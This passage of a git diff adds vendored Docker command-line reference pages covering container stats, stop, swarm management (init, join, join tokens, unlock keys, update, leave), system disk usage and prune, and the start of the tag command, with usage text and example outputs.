+    9c76f7834ae2        0.07%               2.746 MiB / 64 MiB      4.29%               1.266 KB / 648 B    12.4 MB / 0 B
+    d1ea048f04e4        0.03%               4.583 MiB / 64 MiB      6.30%               2.854 KB / 648 B    27.7 MB / 0 B
+
+Running `docker stats` on multiple containers by name and id against a Linux daemon.
+
+    $ docker stats fervent_panini 5acfcb1b4fd1
+    CONTAINER           CPU %               MEM USAGE/LIMIT       MEM %               NET I/O
+    5acfcb1b4fd1        0.00%               115.2 MiB/1.045 GiB   11.03%              1.422 kB/648 B
+    fervent_panini      0.02%               11.08 MiB/1.045 GiB   1.06%               648 B/648 B
+
+Running `docker stats` on all running containers against a Windows daemon.
+
+    PS E:\> docker stats
+    CONTAINER           CPU %               PRIV WORKING SET    NET I/O             BLOCK I/O
+    09d3bb5b1604        6.61%               38.21 MiB           17.1 kB / 7.73 kB   10.7 MB / 3.57 MB
+    9db7aa4d986d        9.19%               38.26 MiB           15.2 kB / 7.65 kB   10.6 MB / 3.3 MB
+    3f214c61ad1d        0.00%               28.64 MiB           64 kB / 6.84 kB     4.42 MB / 6.93 MB
+
+Running `docker stats` on multiple containers by name and id against a Windows daemon.
+
+    PS E:\> docker ps -a
+    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
+    3f214c61ad1d        nanoserver          "cmd"               2 minutes ago       Up 2 minutes                            big_minsky
+    9db7aa4d986d        windowsservercore   "cmd"               2 minutes ago       Up 2 minutes                            mad_wilson
+    09d3bb5b1604        windowsservercore   "cmd"               2 minutes ago       Up 2 minutes                            affectionate_easley
+
+    PS E:\> docker stats 3f214c61ad1d mad_wilson
+    CONTAINER           CPU %               PRIV WORKING SET    NET I/O             BLOCK I/O
+    3f214c61ad1d        0.00%               46.25 MiB           76.3 kB / 7.92 kB   10.3 MB / 14.7 MB
+    mad_wilson          9.59%               40.09 MiB           27.6 kB / 8.81 kB   17 MB / 20.1 MB
+
+## Formatting
+
+The formatting option (`--format`) pretty prints container output
+using a Go template.
+
+Valid placeholders for the Go template are listed below:
+
+Placeholder  | Description
+------------ | --------------------------------------------
+`.Container` | Container name or ID (user input)
+`.Name`      | Container name
+`.ID`        | Container ID
+`.CPUPerc`   | CPU percentage
+`.MemUsage`  | Memory usage
+`.NetIO`     | Network IO
+`.BlockIO`   | Block IO
+`.MemPerc`   | Memory percentage (Not available on Windows)
+`.PIDs`      | Number of PIDs (Not available on Windows)
+
+
+When using the `--format` option, the `stats` command either
+outputs the data exactly as the template declares or, when using the
+`table` directive, includes column headers as well.
+
+The following example uses a template without headers and outputs the
+`Container` and `CPUPerc` entries separated by a colon for all images:
+
+```bash
+$ docker stats --format "{{.Container}}: {{.CPUPerc}}"
+
+09d3bb5b1604: 6.61%
+9db7aa4d986d: 9.19%
+3f214c61ad1d: 0.00%
+```
+
+To list all containers statistics with their name, CPU percentage and memory
+usage in a table format you can use:
+
+```bash
+$ docker stats --format "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}"
+
+CONTAINER           CPU %               PRIV WORKING SET
+1285939c1fd3        0.07%               796 KiB / 64 MiB
+9c76f7834ae2        0.07%               2.746 MiB / 64 MiB
+d1ea048f04e4        0.03%               4.583 MiB / 64 MiB
+```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stop.md b/vendor/github.com/docker/docker/docs/reference/commandline/stop.md
new file mode 100644
index 0000000000..3090db98ae
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/stop.md
@@ -0,0 +1,29 @@
+---
+title: "stop"
+description: "The stop command description and usage"
+keywords: "stop, SIGKILL, SIGTERM"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# stop
+
+```markdown
+Usage:  docker stop [OPTIONS] CONTAINER [CONTAINER...]
+
+Stop one or more running containers
+
+Options:
+      --help       Print usage
+  -t, --time int   Seconds to wait for stop before killing it (default 10)
+```
+
+The main process inside the container will receive `SIGTERM`, and after a grace
+period, `SIGKILL`.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md
new file mode 100644
index 0000000000..44afc27476
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md
@@ -0,0 +1,142 @@
+---
+title: "swarm init"
+description: "The swarm init command description and usage"
+keywords: "swarm, init"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# swarm init
+
+```markdown
+Usage:  docker swarm init [OPTIONS]
+
+Initialize a swarm
+
+Options:
+      --advertise-addr string           Advertised address (format: <ip|interface>[:port])
+      --autolock                        Enable manager autolocking (requiring an unlock key to start a stopped manager)
+      --cert-expiry duration            Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s)
+      --dispatcher-heartbeat duration   Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s)
+      --external-ca external-ca         Specifications of one or more certificate signing endpoints
+      --force-new-cluster               Force create a new cluster from current state
+      --help                            Print usage
+      --listen-addr node-addr           Listen address (format: <ip|interface>[:port]) (default 0.0.0.0:2377)
+      --max-snapshots uint              Number of additional Raft snapshots to retain
+      --snapshot-interval uint          Number of log entries between Raft snapshots (default 10000)
+      --task-history-limit int          Task history retention limit (default 5)
+```
+
+Initialize a swarm. The docker engine targeted by this command becomes a manager
+in the newly created single-node swarm.
+
+
+```bash
+$ docker swarm init --advertise-addr 192.168.99.121
+Swarm initialized: current node (bvz81updecsj6wjz393c09vti) is now a manager.
+
+To add a worker to this swarm, run the following command:
+
+    docker swarm join \
+    --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \
+    172.17.0.2:2377
+
+To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.
+```
+
+`docker swarm init` generates two random tokens, a worker token and a manager token. When you join
+a new node to the swarm, the node joins as a worker or manager node based upon the token you pass
+to [swarm join](swarm_join.md).
+
+After you create the swarm, you can display or rotate the token using
+[swarm join-token](swarm_join_token.md).
+
+### `--autolock`
+
+This flag enables automatic locking of managers with an encryption key. The
+private keys and data stored by all managers will be protected by the
+encryption key printed in the output, and will not be accessible without it.
+Thus, it is very important to store this key in order to activate a manager
+after it restarts. The key can be passed to `docker swarm unlock` to reactivate
+the manager. Autolock can be disabled by running
+`docker swarm update --autolock=false`. After disabling it, the encryption key
+is no longer required to start the manager, and it will start up on its own
+without user intervention.
+
+### `--cert-expiry`
+
+This flag sets the validity period for node certificates.
+
+### `--dispatcher-heartbeat`
+
+This flag sets the frequency with which nodes are told to use as a
+period to report their health.
+
+### `--external-ca`
+
+This flag sets up the swarm to use an external CA to issue node certificates. The value takes
+the form `protocol=X,url=Y`. The value for `protocol` specifies what protocol should be used
+to send signing requests to the external CA. Currently, the only supported value is `cfssl`.
+The URL specifies the endpoint where signing requests should be submitted.
+
+### `--force-new-cluster`
+
+This flag forces an existing node that was part of a quorum that was lost to restart as a single node Manager without losing its data.
+
+### `--listen-addr`
+
+The node listens for inbound swarm manager traffic on this address. The default is to listen on
+0.0.0.0:2377. It is also possible to specify a network interface to listen on that interface's
+address; for example `--listen-addr eth0:2377`.
+
+Specifying a port is optional. If the value is a bare IP address or interface
+name, the default port 2377 will be used.
+
+### `--advertise-addr`
+
+This flag specifies the address that will be advertised to other members of the
+swarm for API access and overlay networking. If unspecified, Docker will check
+if the system has a single IP address, and use that IP address with the
+listening port (see `--listen-addr`). If the system has multiple IP addresses,
+`--advertise-addr` must be specified so that the correct address is chosen for
+inter-manager communication and overlay networking.
+
+It is also possible to specify a network interface to advertise that interface's address;
+for example `--advertise-addr eth0:2377`.
+
+Specifying a port is optional. If the value is a bare IP address or interface
+name, the default port 2377 will be used.
+
+### `--task-history-limit`
+
+This flag sets up task history retention limit.
+
+### `--max-snapshots`
+
+This flag sets the number of old Raft snapshots to retain in addition to the
+current Raft snapshots. By default, no old snapshots are retained. This option
+may be used for debugging, or to store old snapshots of the swarm state for
+disaster recovery purposes.
+
+### `--snapshot-interval`
+
+This flag specifies how many log entries to allow in between Raft snapshots.
+Setting this to a higher number will trigger snapshots less frequently.
+Snapshots compact the Raft log and allow for more efficient transfer of the
+state to new managers. However, there is a performance cost to taking snapshots
+frequently.
+
+## Related information
+
+* [swarm join](swarm_join.md)
+* [swarm leave](swarm_leave.md)
+* [swarm update](swarm_update.md)
+* [swarm join-token](swarm_join_token.md)
+* [node rm](node_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md
new file mode 100644
index 0000000000..0cde0d7bcd
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md
@@ -0,0 +1,102 @@
+---
+title: "swarm join"
+description: "The swarm join command description and usage"
+keywords: "swarm, join"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# swarm join
+
+```markdown
+Usage:  docker swarm join [OPTIONS] HOST:PORT
+
+Join a swarm as a node and/or manager
+
+Options:
+      --advertise-addr string   Advertised address (format: <ip|interface>[:port])
+      --help                    Print usage
+      --listen-addr node-addr   Listen address (format: <ip|interface>[:port]) (default 0.0.0.0:2377)
+      --token string            Token for entry into the swarm
+```
+
+Join a node to a swarm. The node joins as a manager node or worker node based upon the token you
+pass with the `--token` flag. If you pass a manager token, the node joins as a manager. If you
+pass a worker token, the node joins as a worker.
+
+### Join a node to swarm as a manager
+
+The example below demonstrates joining a manager node using a manager token.
+
+```bash
+$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 192.168.99.121:2377
+This node joined a swarm as a manager.
+$ docker node ls
+ID                           HOSTNAME  STATUS  AVAILABILITY  MANAGER STATUS
+dkp8vy1dq1kxleu9g4u78tlag *  manager2  Ready   Active        Reachable
+dvfxp4zseq4s0rih1selh0d20    manager1  Ready   Active        Leader
+```
+
+A cluster should only have 3-7 managers at most, because a majority of managers must be available
+for the cluster to function. Nodes that aren't meant to participate in this management quorum
+should join as workers instead. Managers should be stable hosts that have static IP addresses.
+
+### Join a node to swarm as a worker
+
+The example below demonstrates joining a worker node using a worker token.
+
+```bash
+$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx 192.168.99.121:2377
+This node joined a swarm as a worker.
+$ docker node ls
+ID                           HOSTNAME  STATUS  AVAILABILITY  MANAGER STATUS
+7ln70fl22uw2dvjn2ft53m3q5    worker2   Ready   Active
+dkp8vy1dq1kxleu9g4u78tlag    worker1   Ready   Active        Reachable
+dvfxp4zseq4s0rih1selh0d20 *  manager1  Ready   Active        Leader
+```
+
+### `--listen-addr value`
+
+If the node is a manager, it will listen for inbound swarm manager traffic on this
+address. The default is to listen on 0.0.0.0:2377. It is also possible to specify a
+network interface to listen on that interface's address; for example `--listen-addr eth0:2377`.
+
+Specifying a port is optional. If the value is a bare IP address, or interface
+name, the default port 2377 will be used.
+
+This flag is generally not necessary when joining an existing swarm.
+
+### `--advertise-addr value`
+
+This flag specifies the address that will be advertised to other members of the
+swarm for API access. If unspecified, Docker will check if the system has a
+single IP address, and use that IP address with the listening port (see
+`--listen-addr`). If the system has multiple IP addresses, `--advertise-addr`
+must be specified so that the correct address is chosen for inter-manager
+communication and overlay networking.
+
+It is also possible to specify a network interface to advertise that interface's address;
+for example `--advertise-addr eth0:2377`.
+
+Specifying a port is optional. If the value is a bare IP address, or interface
+name, the default port 2377 will be used.
+
+This flag is generally not necessary when joining an existing swarm.
+
+### `--token string`
+
+Secret value required for nodes to join the swarm
+
+
+## Related information
+
+* [swarm init](swarm_init.md)
+* [swarm leave](swarm_leave.md)
+* [swarm update](swarm_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md
new file mode 100644
index 0000000000..d731f028ba
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md
@@ -0,0 +1,105 @@
+---
+title: "swarm join-token"
+description: "The swarm join-token command description and usage"
+keywords: "swarm, join-token"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# swarm join-token
+
+```markdown
+Usage:	docker swarm join-token [OPTIONS] (worker|manager)
+
+Manage join tokens
+
+Options:
+      --help     Print usage
+  -q, --quiet    Only display token
+      --rotate   Rotate join token
+```
+
+Join tokens are secrets that allow a node to join the swarm. There are two
+different join tokens available, one for the worker role and one for the manager
+role. You pass the token using the `--token` flag when you run
+[swarm join](swarm_join.md). Nodes use the join token only when they join the
+swarm.
+
+You can view or rotate the join tokens using `swarm join-token`.
+
+As a convenience, you can pass `worker` or `manager` as an argument to
+`join-token` to print the full `docker swarm join` command to join a new node to
+the swarm:
+
+```bash
+$ docker swarm join-token worker
+To add a worker to this swarm, run the following command:
+
+    docker swarm join \
+    --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \
+    172.17.0.2:2377
+
+$ docker swarm join-token manager
+To add a manager to this swarm, run the following command:
+
+    docker swarm join \
+    --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 \
+    172.17.0.2:2377
+```
+
+Use the `--rotate` flag to generate a new join token for the specified role:
+
+```bash
+$ docker swarm join-token --rotate worker
+Successfully rotated worker join token.
+
+To add a worker to this swarm, run the following command:
+
+    docker swarm join \
+    --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t \
+    172.17.0.2:2377
+```
+
+After using `--rotate`, only the new token will be valid for joining with the specified role.
+
+The `-q` (or `--quiet`) flag only prints the token:
+
+```bash
+$ docker swarm join-token -q worker
+
+SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t
+```
+
+### `--rotate`
+
+Because tokens allow new nodes to join the swarm, you should keep them secret.
+Be particularly careful with manager tokens since they allow new manager nodes
+to join the swarm. A rogue manager has the potential to disrupt the operation of
+your swarm.
+
+Rotate your swarm's join token if a token gets checked-in to version control,
+stolen, or a node is compromised. You may also want to periodically rotate the
+token to ensure any unknown token leaks do not allow a rogue node to join
+the swarm.
+
+To rotate the join token and print the newly generated token, run
+`docker swarm join-token --rotate` and pass the role: `manager` or `worker`.
+
+Rotating a join-token means that no new nodes will be able to join the swarm
+using the old token. Rotation does not affect existing nodes in the swarm
+because the join token is only used for authorizing new nodes joining the swarm.
+
+### `--quiet`
+
+Only print the token. Do not print a complete command for joining.
+
+## Related information
+
+* [swarm join](swarm_join.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md
new file mode 100644
index 0000000000..c0d9437818
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md
@@ -0,0 +1,58 @@
+---
+title: "swarm leave"
+description: "The swarm leave command description and usage"
+keywords: "swarm, leave"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# swarm leave
+
+```markdown
+Usage:	docker swarm leave [OPTIONS]
+
+Leave the swarm
+
+Options:
+  -f, --force   Force this node to leave the swarm, ignoring warnings
+      --help    Print usage
+```
+
+When you run this command on a worker, that worker leaves the swarm.
+
+You can use the `--force` option to on a manager to remove it from the swarm.
+However, this does not reconfigure the swarm to ensure that there are enough
+managers to maintain a quorum in the swarm. The safe way to remove a manager
+from a swarm is to demote it to a worker and then direct it to leave the quorum
+without using `--force`. Only use `--force` in situations where the swarm will
+no longer be used after the manager leaves, such as in a single-node swarm.
+
+Consider the following swarm, as seen from the manager:
+```bash
+$ docker node ls
+ID                           HOSTNAME  STATUS  AVAILABILITY  MANAGER STATUS
+7ln70fl22uw2dvjn2ft53m3q5    worker2   Ready   Active
+dkp8vy1dq1kxleu9g4u78tlag    worker1   Ready   Active
+dvfxp4zseq4s0rih1selh0d20 *  manager1  Ready   Active        Leader
+```
+
+To remove `worker2`, issue the following command from `worker2` itself:
+```bash
+$ docker swarm leave
+Node left the default swarm.
+```
+To remove an inactive node, use the [`node rm`](node_rm.md) command instead.
+
+## Related information
+
+* [node rm](node_rm.md)
+* [swarm init](swarm_init.md)
+* [swarm join](swarm_join.md)
+* [swarm update](swarm_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md
new file mode 100644
index 0000000000..164b7d35a4
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md
@@ -0,0 +1,41 @@
+---
+title: "swarm unlock"
+description: "The swarm unlock command description and usage"
+keywords: "swarm, unlock"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# swarm unlock
+
+```markdown
+Usage:	docker swarm unlock
+
+Unlock swarm
+
+Options:
+      --help   Print usage
+```
+
+Unlocks a locked manager using a user-supplied unlock key. This command must be
+used to reactivate a manager after its Docker daemon restarts if the autolock
+setting is turned on. The unlock key is printed at the time when autolock is
+enabled, and is also available from the `docker swarm unlock-key` command.
+
+
+```bash
+$ docker swarm unlock
+Please enter unlock key:
+```
+
+## Related information
+
+* [swarm init](swarm_init.md)
+* [swarm update](swarm_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md
new file mode 100644
index 0000000000..a2597fe9ab
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md
@@ -0,0 +1,84 @@
+---
+title: "swarm unlock-key"
+description: "The swarm unlock-keycommand description and usage"
+keywords: "swarm, unlock-key"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# swarm unlock-key
+
+```markdown
+Usage:	docker swarm unlock-key [OPTIONS]
+
+Manage the unlock key
+
+Options:
+      --help     Print usage
+  -q, --quiet    Only display token
+      --rotate   Rotate unlock key
+```
+
+An unlock key is a secret key needed to unlock a manager after its Docker daemon
+restarts. These keys are only used when the autolock feature is enabled for the
+swarm.
+
+You can view or rotate the unlock key using `swarm unlock-key`. To view the key,
+run the `docker swarm unlock-key` command without any arguments:
+
+
+```bash
+$ docker swarm unlock-key
+To unlock a swarm manager after it restarts, run the `docker swarm unlock`
+command and provide the following key:
+
+    SWMKEY-1-fySn8TY4w5lKcWcJPIpKufejh9hxx5KYwx6XZigx3Q4
+
+Please remember to store this key in a password manager, since without it you
+will not be able to restart the manager.
+```
+
+Use the `--rotate` flag to rotate the unlock key to a new, randomly-generated
+key:
+
+```bash
+$ docker swarm unlock-key --rotate
+Successfully rotated manager unlock key.
+
+To unlock a swarm manager after it restarts, run the `docker swarm unlock`
+command and provide the following key:
+
+    SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8
+
+Please remember to store this key in a password manager, since without it you
+will not be able to restart the manager.
+```
+
+The `-q` (or `--quiet`) flag only prints the key:
+
+```bash
+$ docker swarm unlock-key -q
+SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8
+```
+
+### `--rotate`
+
+This flag rotates the unlock key, replacing it with a new randomly-generated
+key. The old unlock key will no longer be accepted.
+
+### `--quiet`
+
+Only print the unlock key, without instructions.
+
+## Related information
+
+* [swarm unlock](swarm_unlock.md)
+* [swarm init](swarm_init.md)
+* [swarm update](swarm_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md
new file mode 100644
index 0000000000..0af63fe3e0
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md
@@ -0,0 +1,45 @@
+---
+title: "swarm update"
+description: "The swarm update command description and usage"
+keywords: "swarm, update"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# swarm update
+
+```markdown
+Usage:  docker swarm update [OPTIONS]
+
+Update the swarm
+
+Options:
+      --autolock                        Change manager autolocking setting (true|false)
+      --cert-expiry duration            Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s)
+      --dispatcher-heartbeat duration   Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s)
+      --external-ca external-ca         Specifications of one or more certificate signing endpoints
+      --help                            Print usage
+      --max-snapshots uint              Number of additional Raft snapshots to retain
+      --snapshot-interval uint          Number of log entries between Raft snapshots (default 10000)
+      --task-history-limit int          Task history retention limit (default 5)
+```
+
+Updates a swarm with new parameter values. This command must target a manager node.
+
+
+```bash
+$ docker swarm update --cert-expiry 720h
+```
+
+## Related information
+
+* [swarm init](swarm_init.md)
+* [swarm join](swarm_join.md)
+* [swarm leave](swarm_leave.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md
new file mode 100644
index 0000000000..c6e8bbdc68
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md
@@ -0,0 +1,76 @@
+---
+title: "system df"
+description: "The system df command description and usage"
+keywords: "system, data, usage, disk"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# system df
+
+```markdown
+Usage:	docker system df [OPTIONS]
+
+Show docker filesystem usage
+
+Options:
+      --help      Print usage
+  -v, --verbose   Show detailed information on space usage
+```
+
+The `docker system df` command displays information regarding the
+amount of disk space used by the docker daemon.
+
+By default the command will just show a summary of the data used:
+```bash
+$ docker system df
+TYPE                TOTAL               ACTIVE              SIZE                RECLAIMABLE
+Images              5                   2                   16.43 MB            11.63 MB (70%)
+Containers          2                   0                   212 B               212 B (100%)
+Local Volumes       2                   1                   36 B                0 B (0%)
+```
+
+A more detailed view can be requested using the `-v, --verbose` flag:
+```bash
+$ docker system df -v
+Images space usage:
+
+REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE                SHARED SIZE         UNIQUE SIZE         CONTAINERS
+my-curl             latest              b2789dd875bf        6 minutes ago       11 MB               11 MB               5 B                 0
+my-jq               latest              ae67841be6d0        6 minutes ago       9.623 MB            8.991 MB            632.1 kB            0
+<none>              <none>              a0971c4015c1        6 minutes ago       11 MB               11 MB               0 B                 0
+alpine              latest              4e38e38c8ce0        9 weeks ago         4.799 MB            0 B                 4.799 MB            1
+alpine              3.3                 47cf20d8c26c        9 weeks ago         4.797 MB            4.797 MB            0 B                 1
+
+Containers space usage:
+
+CONTAINER ID        IMAGE               COMMAND             LOCAL VOLUMES       SIZE                CREATED             STATUS                      NAMES
+4a7f7eebae0f        alpine:latest       "sh"                1                   0 B                 16 minutes ago      Exited (0) 5 minutes ago    hopeful_yalow
+f98f9c2aa1ea        alpine:3.3          "sh"                1                   212 B               16 minutes ago      Exited (0) 48 seconds ago   anon-vol
+
+Local Volumes space usage:
+
+NAME                                                               LINKS               SIZE
+07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e   2                   36 B
+my-named-vol                                                       0                   0 B
+```
+
+* `SHARED SIZE` is the amount of space that an image shares with another one (i.e. their common data)
+* `UNIQUE SIZE` is the amount of space that is only used by a given image
+* `SIZE` is the virtual size of the image, it is the sum of `SHARED SIZE` and `UNIQUE SIZE`
+
+Note that network information is not shown because it doesn't consume the disk space.
+
+## Related Information
+* [system prune](system_prune.md)
+* [container prune](container_prune.md)
+* [volume prune](volume_prune.md)
+* [image prune](image_prune.md)
+* [network prune](network_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md
new file mode 100644
index 0000000000..46f8c4364a
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md
@@ -0,0 +1,79 @@
+---
+title: "system prune"
+description: "Remove unused data"
+keywords: "system, prune, delete, remove"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# system prune
+
+```markdown
+Usage:	docker system prune [OPTIONS]
+
+Delete unused data
+
+Options:
+  -a, --all     Remove all unused data not just dangling ones
+  -f, --force   Do not prompt for confirmation
+      --help    Print usage
+```
+
+Remove all unused containers, volumes, networks and images (both dangling and unreferenced).
+
+Example output:
+
+```bash
+$ docker system prune -a
+WARNING! This will remove:
+	- all stopped containers
+	- all volumes not used by at least one container
+	- all networks not used by at least one container
+	- all images without at least one container associated to them
+Are you sure you want to continue? [y/N] y
+Deleted Containers:
+0998aa37185a1a7036b0e12cf1ac1b6442dcfa30a5c9650a42ed5010046f195b
+73958bfb884fa81fa4cc6baf61055667e940ea2357b4036acbbe25a60f442a4d
+
+Deleted Volumes:
+named-vol
+
+Deleted Images:
+untagged: my-curl:latest
+deleted: sha256:7d88582121f2a29031d92017754d62a0d1a215c97e8f0106c586546e7404447d
+deleted: sha256:dd14a93d83593d4024152f85d7c63f76aaa4e73e228377ba1d130ef5149f4d8b
+untagged: alpine:3.3
+deleted: sha256:695f3d04125db3266d4ab7bbb3c6b23aa4293923e762aa2562c54f49a28f009f
+untagged: alpine:latest
+deleted: sha256:ee4603260daafe1a8c2f3b78fd760922918ab2441cbb2853ed5c439e59c52f96
+deleted: sha256:9007f5987db353ec398a223bc5a135c5a9601798ba20a1abba537ea2f8ac765f
+deleted: sha256:71fa90c8f04769c9721459d5aa0936db640b92c8c91c9b589b54abd412d120ab
+deleted: sha256:bb1c3357b3c30ece26e6604aea7d2ec0ace4166ff34c3616701279c22444c0f3
+untagged: my-jq:latest
+deleted: sha256:6e66d724542af9bc4c4abf4a909791d7260b6d0110d8e220708b09e4ee1322e1
+deleted: sha256:07b3fa89d4b17009eb3988dfc592c7d30ab3ba52d2007832dffcf6d40e3eda7f
+deleted: sha256:3a88a5c81eb5c283e72db2dbc6d65cbfd8e80b6c89bb6e714cfaaa0eed99c548
+
+Total reclaimed space: 13.5 MB
+```
+
+## Related information
+
+* [volume create](volume_create.md)
+* [volume ls](volume_ls.md)
+* [volume inspect](volume_inspect.md)
+* [volume rm](volume_rm.md)
+* [volume prune](volume_prune.md)
+* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
+* [system df](system_df.md)
+* [container prune](container_prune.md)
+* [image prune](image_prune.md)
+* [network prune](network_prune.md)
+* [system prune](system_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/tag.md b/vendor/github.com/docker/docker/docs/reference/commandline/tag.md
new file mode 100644
index 0000000000..983bfe27b2
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/tag.md
@@ -0,0 +1,74 @@
+---
+title: "tag"
+description: "The tag command description and usage"
+keywords: "tag, name, image"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# tag
+
+```markdown
+Usage:  docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]
+
+Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE
+
+Options:
+      --help   Print usage
+```
+
+An image name is made up of slash-separated name components, optionally prefixed
+by a registry hostname. The hostname must comply with standard DNS rules, but
+may not contain underscores. If a hostname is present, it may optionally be
